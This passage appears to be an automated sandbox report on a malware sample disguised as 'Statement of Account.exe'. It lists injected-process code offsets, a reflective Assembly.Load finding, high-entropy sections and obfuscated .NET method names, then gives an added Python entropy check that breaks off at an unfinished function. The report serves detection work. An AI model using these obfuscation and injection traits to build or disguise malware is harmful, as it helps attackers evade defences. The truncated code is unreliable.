Source: 8.2.SIZfuXT.exe.32ea7f8.0.raw.unpack, RZ.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0041794F push ss; ret 6_2_0041797F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_00417993 push ss; ret 6_2_0041797F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_00416B24 push ss; retf 6_2_00416B27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0041D475 push eax; ret 6_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0041D4C2 push eax; ret 6_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0041D4CB push eax; ret 6_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0041ED53 push dword ptr [914FBFDDh]; ret 6_2_0041ED74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0041D52C push eax; ret 6_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0041E77C push 2E339416h; ret 6_2_0041E842
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0041779C push esp; retf 6_2_0041779D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C127FA pushad ; ret 6_2_05C127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C1225F pushad ; ret 6_2_05C127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C409AD push ecx; mov dword ptr [esp], ecx 6_2_05C409B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C1283D push eax; iretd 6_2_05C12858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C11368 push eax; iretd 6_2_05C11369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C119A8 push ds; retn 0005h 6_2_05C119B6
Source: C:\Windows\explorer.exe | Code function: 7_2_0E5A4B1E push esp; retn 0000h 7_2_0E5A4B1F
Source: C:\Windows\explorer.exe | Code function: 7_2_0E5A4B02 push esp; retn 0000h 7_2_0E5A4B03
Source: C:\Windows\explorer.exe | Code function: 7_2_0E5A49B5 push esp; retn 0000h 7_2_0E5A4AE7
Source: C:\Windows\explorer.exe | Code function: 7_2_0E66DB02 push esp; retn 0000h 7_2_0E66DB03
Source: C:\Windows\explorer.exe | Code function: 7_2_0E66DB1E push esp; retn 0000h 7_2_0E66DB1F
Source: C:\Windows\explorer.exe | Code function: 7_2_0E66D9B5 push esp; retn 0000h 7_2_0E66DAE7
Source: C:\Windows\explorer.exe | Code function: 7_2_0E7F3B1E push esp; retn 0000h 7_2_0E7F3B1F
Source: C:\Windows\explorer.exe | Code function: 7_2_0E7F3B02 push esp; retn 0000h 7_2_0E7F3B03
Source: C:\Windows\explorer.exe | Code function: 7_2_0E7F39B5 push esp; retn 0000h 7_2_0E7F3AE7
Source: C:\Windows\explorer.exe | Code function: 7_2_0F6EDB02 push esp; retn 0000h 7_2_0F6EDB03
Source: C:\Windows\explorer.exe | Code function: 7_2_0F6EDB1E push esp; retn 0000h 7_2_0F6EDB1F
Source: C:\Windows\explorer.exe | Code function: 7_2_0F6ED9B5 push esp; retn 0000h 7_2_0F6EDAE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 12_2_0561C06D push edi; ret 12_2_0561C06F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 12_2_05620E7F push edi; ret 12_2_05620E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 12_2_055D09AD push ecx; mov dword ptr [esp], ecx 12_2_055D09B6
Source: Statement of Account.exe | Static PE information: section name: .text entropy: 7.785000969686177
Source: SIZfuXT.exe.0.dr | Static PE information: section name: .text entropy: 7.785000969686177
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, BFaMK2EQJcYgGTNiOi.cs | High entropy of concatenated method names: 'CVPayjNheF', 'xtZaJxdqj9', 'TijaEsb4NM', 'GCyajNj97q', 'V6Ta1YnOvi', 'eSIauwLTNp', 'UryaKVBgjf', 'O45aL0l7Yq', 'W3maGAc0Gf', 'etca8hQhFE'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, wDus2skaqqyhDZoA7u.cs | High entropy of concatenated method names: 'a8fRVfHeSY', 'AltRDCf4Uf', 'pyPRikltki', 'Ma0R9BxRrZ', 'NYIRTNuspT', 'Fy6RwPXmoY', 'X2MRNrSdEN', 'xLlRoBThUP', 'pQuRgLCYsD', 'YJ4RHYaIDJ'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, GH5cpf2ynEV7MPEjrp.cs | High entropy of concatenated method names: 'yj7RvEYKY6', 'BX3R1RSpv4', 'O4gRudIKHs', 'KjjRKMaB3R', 'x1GREWecDZ', 'NnMRLn1Ub1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, piVZYUd937jqjJGPQH.cs | High entropy of concatenated method names: 'iWDwra04AG', 'nAdwUd2npM', 'C80wM4BVTw', 'zbbweU9hpO', 'RW3wqoqQpk', 'dQfwOHwTFg', 'slWwQMJOWd', 'oTDwBs5chC', 'Fkww7x05yS', 'eJ6wZh6STE'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, tXNOnQxWMqJZBBg8UI.cs | High entropy of concatenated method names: 'K834gc2YYa', 'Qv84H9aNBK', 'ToString', 'Bau4V3pTh4', 'rbP4DmO6uq', 'au34ihVFdJ', 'oao496VeMs', 'zoc4TwwB0l', 'X754wfUXyC', 'O5Y4NKJV6C'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, xmtO82pjoVLVJNORKv.cs | High entropy of concatenated method names: 'nmpFwHcwPa', 'urBFNVw3QX', 'slWFgEXHHZ', 'pwbFHPjxtZ', 'BfqFaDDKbR', 'peJFI16WNG', 'kHv3GJ5aZEr95CeXr6', 'C71Wm9aPx8Q1x83QsQ', 'c13FFuArcC', 'n1kFnJeq9Y'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, iHA8dW7lWEXHHZIwbP.cs | High entropy of concatenated method names: 'KpxiekfaMd', 'Ei8iOC0JrM', 'EpAiB8kvEM', 'cEri7v6wXH', 'QDgiasticw', 'MZkiISxQBZ', 'DL9i4B2XR0', 'GLfiRbM2Nv', 'd49iW5nVi1', 'mGkiPjZr8Y'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, wNO6UNA7PZZq5xgB2l.cs | High entropy of concatenated method names: 'p6u4kM5lWt', 'UH34miGprc', 'xymRCmr7mW', 'OD8RF2XXSw', 'Ujg40I2Peu', 'oG34JaOxjj', 'pvS4hHNB3A', 'fhP4EUkI8u', 'qyM4jdTZnY', 'bKc4XPq0O2'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, nVZ6GfDd2Njl6pJbHq.cs | High entropy of concatenated method names: 'Dispose', 'XbWF2PdgnY', 'LsbS1KVcuj', 'z0wccWt4sy', 'ecDFmus2sa', 'BqyFzhDZoA', 'ProcessDialogKey', 'EuvSCH5cpf', 'NnESFV7MPE', 'SrpSSpL4Wl'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, o0c0J3SSaFSfA4cU4U.cs | High entropy of concatenated method names: 'iJhM3ZQjZ', 'nXWeouXbH', 'IReOUcTkt', 'mOGQoZC5d', 'MXc788IVg', 'vesZk8yag', 'FycFTqj7BIPwc0B2Hb', 'XDPc3jnVr8HUgMmIse', 'R4hRgON9W', 'uRMPs2i9d'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, aNt0kvhOA4r79J034O.cs | High entropy of concatenated method names: 'LxaYBt4oAK', 'jA1Y7LhWpE', 'a41Yva4vVV', 'Dy4Y12GcOn', 'sndYKKf9me', 'epfYLGDtuS', 'muKY8fMmVw', 'TBXY3Cwct5', 'pCCYyi2VDi', 'VSTY0Mp92X'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, IbRaeJv16WNGGiFFKM.cs | High entropy of concatenated method names: 'QXxTfDnEge', 'eo4TDPuChL', 'KLjT9Gm1ls', 'NonTwT9sxP', 'XkZTN1hDQb', 'JoR96SHodZ', 'pnK9Avo5e5', 'CAT9l3jyls', 'm1f9koUbfG', 'jU392xxbMm'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, dVqm1OFnHbnbVGkLyVO.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RrFPE39kgE', 'HbePj4cCyy', 'DLWPXEVJdI', 'XZLPxg5WNi', 'lZqP6MngMg', 'cgmPADyicl', 'fF5PlpHXnc'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, dL4WlUmMRQ2b1fG4m4.cs | High entropy of concatenated method names: 'MDgWFQD7O3', 'VcaWnmpnhw', 'U7EWpiyGdS', 'MHhWVcumkD', 'VQpWDkGn5l', 'Q3JW9560Ob', 'CMlWTM96Y7', 'fwGRluKMlm', 'bgVRkgxFkT', 'FjtR2VV90Q'
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, dHcwPaBtrBVw3QXCBV.cs | High entropy of concatenated method names: 'wwbDETCkwV', 'wdfDjM6tI2', 'LPuDXaShZd', 'PdfDxov5mO', 'C7yD6NCVRs', 'qXyDAboLjZ', 'P88DlMkPCF', 'cDfDk5bYBV', 'UcwD2cNCmf', 'hhJDmohOYy'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.csHigh entropy of concatenated method names: 'N5AnfGnof0', 'moxnVfrmm1', 'xk6nDDJ6tb', 'oMTni8GYbb', 'xFin91jVTq', 'TQ0nTShJSx', 'RXcnwDxRuU', 'Pi8nN54pCw', 'fnHnojHh51', 'QZcngjsdwf'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, NBT97XX2SDM6oGlSbG.csHigh entropy of concatenated method names: 'ToString', 'oNqI0R5w5m', 'XJoI1MfUht', 'RMQIuj56yp', 'Ow8IKTHMmM', 'kAWILdfs4k', 'rMGIGrYoSn', 'WABI8ss1cD', 'WqRI31Qoqv', 'qpHIdxA6Y7'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, RxtZ7GZAg7MmvOfqDD.csHigh entropy of concatenated method names: 'N9g9qQAuGQ', 'wTb9Qluaat', 'HUniugHtit', 'eyfiK5w3K3', 'xh1iLatC5C', 'x76iGg787Q', 'iTxi8bsJZq', 'AlQi3ZAIbQ', 'MGYidlfIGY', 'p75iy2J57r'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, OCG6vC8lrRS2FsMFyk.csHigh entropy of concatenated method names: 'aiwwVXBjwF', 'HRBwi25cLi', 'P65wT6eZdT', 'Op5TmEPFH9', 'KqBTzNBXnx', 'ql8wCx53FR', 'xF9wFcuKW2', 'AkFwS2SahI', 'VkSwnVIUPb', 'M2dwpnscM3'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, b7Ph0RzMVq5MZym5UK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zBVWYfMOU5', 'zkgWaV2f58', 'OQkWIQ0rcw', 'FuwW4bCSMK', 'Fk3WRGfNfp', 'kAKWWRqTkG', 'FGnWPaIr5y'
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, c4WUnNFC4vMmlKQoIHO.csHigh entropy of concatenated method names: 'LspWrWyYMc', 'AdSWUfmPPj', 'k9PWMZDfLp', 'q9lWe79M4u', 'OFkWq2UJJO', 'sb5WOjGTm7', 'kOuWQTdCmG', 'dpYWBahl4J', 'htNW7Ji9uZ', 'RtQWZrKgZT'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, BFaMK2EQJcYgGTNiOi.csHigh entropy of concatenated method names: 'CVPayjNheF', 'xtZaJxdqj9', 'TijaEsb4NM', 'GCyajNj97q', 'V6Ta1YnOvi', 'eSIauwLTNp', 'UryaKVBgjf', 'O45aL0l7Yq', 'W3maGAc0Gf', 'etca8hQhFE'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, wDus2skaqqyhDZoA7u.csHigh entropy of concatenated method names: 'a8fRVfHeSY', 'AltRDCf4Uf', 'pyPRikltki', 'Ma0R9BxRrZ', 'NYIRTNuspT', 'Fy6RwPXmoY', 'X2MRNrSdEN', 'xLlRoBThUP', 'pQuRgLCYsD', 'YJ4RHYaIDJ'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, GH5cpf2ynEV7MPEjrp.csHigh entropy of concatenated method names: 'yj7RvEYKY6', 'BX3R1RSpv4', 'O4gRudIKHs', 'KjjRKMaB3R', 'x1GREWecDZ', 'NnMRLn1Ub1', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, piVZYUd937jqjJGPQH.csHigh entropy of concatenated method names: 'iWDwra04AG', 'nAdwUd2npM', 'C80wM4BVTw', 'zbbweU9hpO', 'RW3wqoqQpk', 'dQfwOHwTFg', 'slWwQMJOWd', 'oTDwBs5chC', 'Fkww7x05yS', 'eJ6wZh6STE'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, tXNOnQxWMqJZBBg8UI.csHigh entropy of concatenated method names: 'K834gc2YYa', 'Qv84H9aNBK', 'ToString', 'Bau4V3pTh4', 'rbP4DmO6uq', 'au34ihVFdJ', 'oao496VeMs', 'zoc4TwwB0l', 'X754wfUXyC', 'O5Y4NKJV6C'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, xmtO82pjoVLVJNORKv.csHigh entropy of concatenated method names: 'nmpFwHcwPa', 'urBFNVw3QX', 'slWFgEXHHZ', 'pwbFHPjxtZ', 'BfqFaDDKbR', 'peJFI16WNG', 'kHv3GJ5aZEr95CeXr6', 'C71Wm9aPx8Q1x83QsQ', 'c13FFuArcC', 'n1kFnJeq9Y'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, iHA8dW7lWEXHHZIwbP.csHigh entropy of concatenated method names: 'KpxiekfaMd', 'Ei8iOC0JrM', 'EpAiB8kvEM', 'cEri7v6wXH', 'QDgiasticw', 'MZkiISxQBZ', 'DL9i4B2XR0', 'GLfiRbM2Nv', 'd49iW5nVi1', 'mGkiPjZr8Y'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, wNO6UNA7PZZq5xgB2l.csHigh entropy of concatenated method names: 'p6u4kM5lWt', 'UH34miGprc', 'xymRCmr7mW', 'OD8RF2XXSw', 'Ujg40I2Peu', 'oG34JaOxjj', 'pvS4hHNB3A', 'fhP4EUkI8u', 'qyM4jdTZnY', 'bKc4XPq0O2'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, nVZ6GfDd2Njl6pJbHq.csHigh entropy of concatenated method names: 'Dispose', 'XbWF2PdgnY', 'LsbS1KVcuj', 'z0wccWt4sy', 'ecDFmus2sa', 'BqyFzhDZoA', 'ProcessDialogKey', 'EuvSCH5cpf', 'NnESFV7MPE', 'SrpSSpL4Wl'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, o0c0J3SSaFSfA4cU4U.csHigh entropy of concatenated method names: 'iJhM3ZQjZ', 'nXWeouXbH', 'IReOUcTkt', 'mOGQoZC5d', 'MXc788IVg', 'vesZk8yag', 'FycFTqj7BIPwc0B2Hb', 'XDPc3jnVr8HUgMmIse', 'R4hRgON9W', 'uRMPs2i9d'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, aNt0kvhOA4r79J034O.csHigh entropy of concatenated method names: 'LxaYBt4oAK', 'jA1Y7LhWpE', 'a41Yva4vVV', 'Dy4Y12GcOn', 'sndYKKf9me', 'epfYLGDtuS', 'muKY8fMmVw', 'TBXY3Cwct5', 'pCCYyi2VDi', 'VSTY0Mp92X'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, IbRaeJv16WNGGiFFKM.csHigh entropy of concatenated method names: 'QXxTfDnEge', 'eo4TDPuChL', 'KLjT9Gm1ls', 'NonTwT9sxP', 'XkZTN1hDQb', 'JoR96SHodZ', 'pnK9Avo5e5', 'CAT9l3jyls', 'm1f9koUbfG', 'jU392xxbMm'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, dVqm1OFnHbnbVGkLyVO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RrFPE39kgE', 'HbePj4cCyy', 'DLWPXEVJdI', 'XZLPxg5WNi', 'lZqP6MngMg', 'cgmPADyicl', 'fF5PlpHXnc'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, dL4WlUmMRQ2b1fG4m4.csHigh entropy of concatenated method names: 'MDgWFQD7O3', 'VcaWnmpnhw', 'U7EWpiyGdS', 'MHhWVcumkD', 'VQpWDkGn5l', 'Q3JW9560Ob', 'CMlWTM96Y7', 'fwGRluKMlm', 'bgVRkgxFkT', 'FjtR2VV90Q'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, dHcwPaBtrBVw3QXCBV.csHigh entropy of concatenated method names: 'wwbDETCkwV', 'wdfDjM6tI2', 'LPuDXaShZd', 'PdfDxov5mO', 'C7yD6NCVRs', 'qXyDAboLjZ', 'P88DlMkPCF', 'cDfDk5bYBV', 'UcwD2cNCmf', 'hhJDmohOYy'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.csHigh entropy of concatenated method names: 'N5AnfGnof0', 'moxnVfrmm1', 'xk6nDDJ6tb', 'oMTni8GYbb', 'xFin91jVTq', 'TQ0nTShJSx', 'RXcnwDxRuU', 'Pi8nN54pCw', 'fnHnojHh51', 'QZcngjsdwf'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, NBT97XX2SDM6oGlSbG.csHigh entropy of concatenated method names: 'ToString', 'oNqI0R5w5m', 'XJoI1MfUht', 'RMQIuj56yp', 'Ow8IKTHMmM', 'kAWILdfs4k', 'rMGIGrYoSn', 'WABI8ss1cD', 'WqRI31Qoqv', 'qpHIdxA6Y7'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, RxtZ7GZAg7MmvOfqDD.csHigh entropy of concatenated method names: 'N9g9qQAuGQ', 'wTb9Qluaat', 'HUniugHtit', 'eyfiK5w3K3', 'xh1iLatC5C', 'x76iGg787Q', 'iTxi8bsJZq', 'AlQi3ZAIbQ', 'MGYidlfIGY', 'p75iy2J57r'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, OCG6vC8lrRS2FsMFyk.csHigh entropy of concatenated method names: 'aiwwVXBjwF', 'HRBwi25cLi', 'P65wT6eZdT', 'Op5TmEPFH9', 'KqBTzNBXnx', 'ql8wCx53FR', 'xF9wFcuKW2', 'AkFwS2SahI', 'VkSwnVIUPb', 'M2dwpnscM3'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, b7Ph0RzMVq5MZym5UK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zBVWYfMOU5', 'zkgWaV2f58', 'OQkWIQ0rcw', 'FuwW4bCSMK', 'Fk3WRGfNfp', 'kAKWWRqTkG', 'FGnWPaIr5y'
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, c4WUnNFC4vMmlKQoIHO.csHigh entropy of concatenated method names: 'LspWrWyYMc', 'AdSWUfmPPj', 'k9PWMZDfLp', 'q9lWe79M4u', 'OFkWq2UJJO', 'sb5WOjGTm7', 'kOuWQTdCmG', 'dpYWBahl4J', 'htNW7Ji9uZ', 'RtQWZrKgZT'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, BFaMK2EQJcYgGTNiOi.csHigh entropy of concatenated method names: 'CVPayjNheF', 'xtZaJxdqj9', 'TijaEsb4NM', 'GCyajNj97q', 'V6Ta1YnOvi', 'eSIauwLTNp', 'UryaKVBgjf', 'O45aL0l7Yq', 'W3maGAc0Gf', 'etca8hQhFE'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, wDus2skaqqyhDZoA7u.csHigh entropy of concatenated method names: 'a8fRVfHeSY', 'AltRDCf4Uf', 'pyPRikltki', 'Ma0R9BxRrZ', 'NYIRTNuspT', 'Fy6RwPXmoY', 'X2MRNrSdEN', 'xLlRoBThUP', 'pQuRgLCYsD', 'YJ4RHYaIDJ'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, GH5cpf2ynEV7MPEjrp.csHigh entropy of concatenated method names: 'yj7RvEYKY6', 'BX3R1RSpv4', 'O4gRudIKHs', 'KjjRKMaB3R', 'x1GREWecDZ', 'NnMRLn1Ub1', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, piVZYUd937jqjJGPQH.csHigh entropy of concatenated method names: 'iWDwra04AG', 'nAdwUd2npM', 'C80wM4BVTw', 'zbbweU9hpO', 'RW3wqoqQpk', 'dQfwOHwTFg', 'slWwQMJOWd', 'oTDwBs5chC', 'Fkww7x05yS', 'eJ6wZh6STE'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, tXNOnQxWMqJZBBg8UI.csHigh entropy of concatenated method names: 'K834gc2YYa', 'Qv84H9aNBK', 'ToString', 'Bau4V3pTh4', 'rbP4DmO6uq', 'au34ihVFdJ', 'oao496VeMs', 'zoc4TwwB0l', 'X754wfUXyC', 'O5Y4NKJV6C'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, xmtO82pjoVLVJNORKv.csHigh entropy of concatenated method names: 'nmpFwHcwPa', 'urBFNVw3QX', 'slWFgEXHHZ', 'pwbFHPjxtZ', 'BfqFaDDKbR', 'peJFI16WNG', 'kHv3GJ5aZEr95CeXr6', 'C71Wm9aPx8Q1x83QsQ', 'c13FFuArcC', 'n1kFnJeq9Y'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, iHA8dW7lWEXHHZIwbP.csHigh entropy of concatenated method names: 'KpxiekfaMd', 'Ei8iOC0JrM', 'EpAiB8kvEM', 'cEri7v6wXH', 'QDgiasticw', 'MZkiISxQBZ', 'DL9i4B2XR0', 'GLfiRbM2Nv', 'd49iW5nVi1', 'mGkiPjZr8Y'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, wNO6UNA7PZZq5xgB2l.csHigh entropy of concatenated method names: 'p6u4kM5lWt', 'UH34miGprc', 'xymRCmr7mW', 'OD8RF2XXSw', 'Ujg40I2Peu', 'oG34JaOxjj', 'pvS4hHNB3A', 'fhP4EUkI8u', 'qyM4jdTZnY', 'bKc4XPq0O2'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, nVZ6GfDd2Njl6pJbHq.csHigh entropy of concatenated method names: 'Dispose', 'XbWF2PdgnY', 'LsbS1KVcuj', 'z0wccWt4sy', 'ecDFmus2sa', 'BqyFzhDZoA', 'ProcessDialogKey', 'EuvSCH5cpf', 'NnESFV7MPE', 'SrpSSpL4Wl'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, o0c0J3SSaFSfA4cU4U.csHigh entropy of concatenated method names: 'iJhM3ZQjZ', 'nXWeouXbH', 'IReOUcTkt', 'mOGQoZC5d', 'MXc788IVg', 'vesZk8yag', 'FycFTqj7BIPwc0B2Hb', 'XDPc3jnVr8HUgMmIse', 'R4hRgON9W', 'uRMPs2i9d'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, aNt0kvhOA4r79J034O.csHigh entropy of concatenated method names: 'LxaYBt4oAK', 'jA1Y7LhWpE', 'a41Yva4vVV', 'Dy4Y12GcOn', 'sndYKKf9me', 'epfYLGDtuS', 'muKY8fMmVw', 'TBXY3Cwct5', 'pCCYyi2VDi', 'VSTY0Mp92X'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, IbRaeJv16WNGGiFFKM.csHigh entropy of concatenated method names: 'QXxTfDnEge', 'eo4TDPuChL', 'KLjT9Gm1ls', 'NonTwT9sxP', 'XkZTN1hDQb', 'JoR96SHodZ', 'pnK9Avo5e5', 'CAT9l3jyls', 'm1f9koUbfG', 'jU392xxbMm'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, dVqm1OFnHbnbVGkLyVO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RrFPE39kgE', 'HbePj4cCyy', 'DLWPXEVJdI', 'XZLPxg5WNi', 'lZqP6MngMg', 'cgmPADyicl', 'fF5PlpHXnc'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, dL4WlUmMRQ2b1fG4m4.csHigh entropy of concatenated method names: 'MDgWFQD7O3', 'VcaWnmpnhw', 'U7EWpiyGdS', 'MHhWVcumkD', 'VQpWDkGn5l', 'Q3JW9560Ob', 'CMlWTM96Y7', 'fwGRluKMlm', 'bgVRkgxFkT', 'FjtR2VV90Q'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, dHcwPaBtrBVw3QXCBV.csHigh entropy of concatenated method names: 'wwbDETCkwV', 'wdfDjM6tI2', 'LPuDXaShZd', 'PdfDxov5mO', 'C7yD6NCVRs', 'qXyDAboLjZ', 'P88DlMkPCF', 'cDfDk5bYBV', 'UcwD2cNCmf', 'hhJDmohOYy'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.csHigh entropy of concatenated method names: 'N5AnfGnof0', 'moxnVfrmm1', 'xk6nDDJ6tb', 'oMTni8GYbb', 'xFin91jVTq', 'TQ0nTShJSx', 'RXcnwDxRuU', 'Pi8nN54pCw', 'fnHnojHh51', 'QZcngjsdwf'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, NBT97XX2SDM6oGlSbG.csHigh entropy of concatenated method names: 'ToString', 'oNqI0R5w5m', 'XJoI1MfUht', 'RMQIuj56yp', 'Ow8IKTHMmM', 'kAWILdfs4k', 'rMGIGrYoSn', 'WABI8ss1cD', 'WqRI31Qoqv', 'qpHIdxA6Y7'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, RxtZ7GZAg7MmvOfqDD.csHigh entropy of concatenated method names: 'N9g9qQAuGQ', 'wTb9Qluaat', 'HUniugHtit', 'eyfiK5w3K3', 'xh1iLatC5C', 'x76iGg787Q', 'iTxi8bsJZq', 'AlQi3ZAIbQ', 'MGYidlfIGY', 'p75iy2J57r'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, OCG6vC8lrRS2FsMFyk.csHigh entropy of concatenated method names: 'aiwwVXBjwF', 'HRBwi25cLi', 'P65wT6eZdT', 'Op5TmEPFH9', 'KqBTzNBXnx', 'ql8wCx53FR', 'xF9wFcuKW2', 'AkFwS2SahI', 'VkSwnVIUPb', 'M2dwpnscM3'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, b7Ph0RzMVq5MZym5UK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zBVWYfMOU5', 'zkgWaV2f58', 'OQkWIQ0rcw', 'FuwW4bCSMK', 'Fk3WRGfNfp', 'kAKWWRqTkG', 'FGnWPaIr5y'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, c4WUnNFC4vMmlKQoIHO.csHigh entropy of concatenated method names: 'LspWrWyYMc', 'AdSWUfmPPj', 'k9PWMZDfLp', 'q9lWe79M4u', 'OFkWq2UJJO', 'sb5WOjGTm7', 'kOuWQTdCmG', 'dpYWBahl4J', 'htNW7Ji9uZ', 'RtQWZrKgZT'
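The findings above all rest on one measurement: Shannon entropy, taken once over the raw bytes of the dropped file's .text section (7.785 bits per byte, close to the 8.0 of random data) and once over the characters of each class's concatenated method names. The Python below is an added example, not code from the Joe Sandbox report, that reproduces both checks so the numbers can be reasoned about. The obfuscated name list is copied from the BFaMK2EQJcYgGTNiOi.cs finding; the readable name list and the byte samples are constructed, and the two thresholds are assumed triage values, not Joe Sandbox's.

```python
import math
from collections import Counter
from typing import Iterable, Union


def shannon_entropy(data: Union[bytes, str]) -> float:
    """Shannon entropy of a byte string or text, in bits per symbol.

    0.0 for a single repeated symbol, log2(alphabet size) when every symbol is
    equally frequent, so at most 8.0 for bytes.
    """
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return sum((n / total) * math.log2(total / n) for n in counts.values())


# Assumed triage thresholds (illustrative, not Joe Sandbox's values). Compiled code
# usually sits around 6 bits/byte; compressed or encrypted payloads approach 8, which
# is why a .text section at 7.785 is flagged.
PE_SECTION_ENTROPY_THRESHOLD = 7.0
# Concatenated method names of hand-written .NET code read like English identifiers;
# names emitted by an obfuscator are near-uniform mixed-case alphanumerics.
METHOD_NAME_ENTROPY_THRESHOLD = 5.0


def section_looks_packed(section_bytes: bytes,
                         threshold: float = PE_SECTION_ENTROPY_THRESHOLD) -> bool:
    """True when a PE section's raw bytes are dense enough to suggest packing/encryption."""
    return shannon_entropy(section_bytes) >= threshold


def method_names_look_obfuscated(names: Iterable[str],
                                 threshold: float = METHOD_NAME_ENTROPY_THRESHOLD) -> bool:
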